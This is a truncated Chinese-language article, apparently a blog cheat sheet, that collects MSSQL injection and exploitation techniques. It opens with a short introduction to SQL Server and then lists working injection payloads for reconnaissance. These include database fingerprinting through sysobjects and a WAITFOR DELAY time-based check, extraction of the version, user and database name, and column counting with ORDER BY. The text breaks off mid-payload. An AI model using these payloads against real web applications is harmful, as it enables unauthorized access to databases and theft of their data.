【超详细】MSSQL注入和漏洞利用姿势汇总（建议收藏）

基础介绍Microsoft SQL Server 是微软开发的关系型数据库管理系统。作为数据库服务器，它是一种软件产品，主要功能是根据其他软件应用程序的请求存储和检索数据，这些应用程序可以在同一台计算机上运行，也可以在网络（包括 Internet）上的另一台计算机上运行。SQL Server 默认开放的端口是 TCP 1433。SQL Server 信息收集• 判断数据库类型/* sysobjects 为 MSSQL 数据库中独有的数据表，如果页面返回正常即可表示为 MSSQL 数据库 */?id=1 and (select count(*) from sysobjects)>0 --/* 通过 MSSQL 数据库中特有的延时函数进行判断 */?id=1;WAITFOR DELAY '00:00:10'; -- • 查询数据库版本信息1 and 1=(select @@version) --• 判断当前数据库用户名?id=1 and user>0;--• 获取当前数据库名?id=1 and db_name()>0;--• 判断字段个数?id=1 order by 6--• 查询当前的本地服务名?id=1 and 1=(sel ………………………………